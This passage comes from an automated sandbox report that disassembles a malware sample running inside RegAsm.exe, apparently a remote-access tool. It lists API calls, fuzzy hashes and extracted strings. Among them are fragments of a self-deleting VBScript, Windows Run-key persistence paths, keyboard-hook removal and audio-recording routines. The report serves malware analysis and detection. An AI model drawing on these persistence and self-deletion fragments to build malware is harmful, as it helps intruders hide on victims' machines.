                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FeaturePresentProcessor
                                                          • String ID: MZ@
                                                          • API String ID: 2325560087-2978689999
                                                          • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                          • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                                                          • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                          • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .
                                                          • API String ID: 0-248832578
                                                          • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                          • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                          • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                          • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .
                                                          • API String ID: 0-248832578
                                                          • Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                                          • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                                                          • Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                                          • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                          • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                          • String ID: lJD
                                                          • API String ID: 1084509184-3316369744
                                                          • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                                          • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                                                          • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                                          • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                          • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                          • String ID: lJD
                                                          • API String ID: 1084509184-3316369744
                                                          • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                                          • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                                                          • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                                          • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID: GetLocaleInfoEx
                                                          • API String ID: 2299586839-2904428671
                                                          • Opcode ID: eeff4f7349616e56738bbc7b8787175557d4d7270555fb13a45f0baf29077f94
                                                          • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                                                          • Opcode Fuzzy Hash: eeff4f7349616e56738bbc7b8787175557d4d7270555fb13a45f0baf29077f94
                                                          • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$_free$InfoLocale_abort
                                                          • String ID:
                                                          • API String ID: 1663032902-0
                                                          • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                                          • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                                                          • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                                          • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$InfoLocale_abort_free
                                                          • String ID:
                                                          • API String ID: 2692324296-0
                                                          • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                          • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                                                          • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                          • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                                                          APIs
                                                            • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                                          • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                          • String ID:
                                                          • API String ID: 1272433827-0
                                                          • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                                          • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                                                          • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                                          • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                          • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                          • String ID:
                                                          • API String ID: 1084509184-0
                                                          • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                                          • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                                                          • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                                          • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                                                          APIs
                                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.0 Pro), ref: 0040F8E5
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID:
                                                          • API String ID: 2299586839-0
                                                          • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                          • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                          • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                          • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                          APIs
                                                            • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                            • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                                            • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                            • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                                                            • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                            • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                                          • ExitProcess.KERNEL32 ref: 0040D7D0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                          • String ID: """, 0$")$0qF$0qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("$[
                                                          • API String ID: 1861856835-1521976869
                                                          • Opcode ID: d1e5175430559d744f3697ac5d4fa8fe9ed39947549674ebcac5be490dbfcb53
                                                          • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                                          • Opcode Fuzzy Hash: d1e5175430559d744f3697ac5d4fa8fe9ed39947549674ebcac5be490dbfcb53
                                                          • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                                          APIs
                                                            • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                            • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                                            • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                            • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                                                            • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                            • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63791986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                                          • ExitProcess.KERNEL32 ref: 0040D419
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                          • String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("$[
                                                          • API String ID: 3797177996-666927926
                                                          • Opcode ID: 6f7c707475e127e0f0984543e97620b4272e3932a2f9fe4e694b6d7d0f6a37c1
                                                          • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                                          • Opcode Fuzzy Hash: 6f7c707475e127e0f0984543e97620b4272e3932a2f9fe4e694b6d7d0f6a37c1
                                                          • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                                          APIs
                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                                          • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                                          • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                                          • GetCurrentProcessId.KERNEL32 ref: 00412541
                                                          • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                                          • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                                          • lstrcatW.KERNEL32 ref: 00412601
                                                            • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                                          • Sleep.KERNEL32(000001F4), ref: 00412682
                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                                          • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                                          • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                          • String ID: .exe$WDH$exepath$open$temp_$[
                                                          • API String ID: 2649220323-3113832601
                                                          • Opcode ID: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                                          • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                                          • Opcode Fuzzy Hash: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                                          • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                                          APIs
                                                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0041B18E
                                                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                                          • SetEvent.KERNEL32 ref: 0041B219
                                                          • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                                          • CloseHandle.KERNEL32 ref: 0041B23A
                                                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                          • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                          • API String ID: 738084811-2094122233
                                                          • Opcode ID: d4d531986ebdffed54c3f9ef309708e30d9cbca520be996da6a9103c531e9c83
                                                          • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                                          • Opcode Fuzzy Hash: d4d531986ebdffed54c3f9ef309708e30d9cbca520be996da6a9103c531e9c83
                                                          • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                          • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                          • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                          • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                          • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                          • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                          • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                          • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                          • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                          • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Write$Create
                                                          • String ID: RIFF$WAVE$data$fmt
                                                          • API String ID: 1602526932-4212202414
                                                          • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                          • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                                          • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                          • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                                          APIs
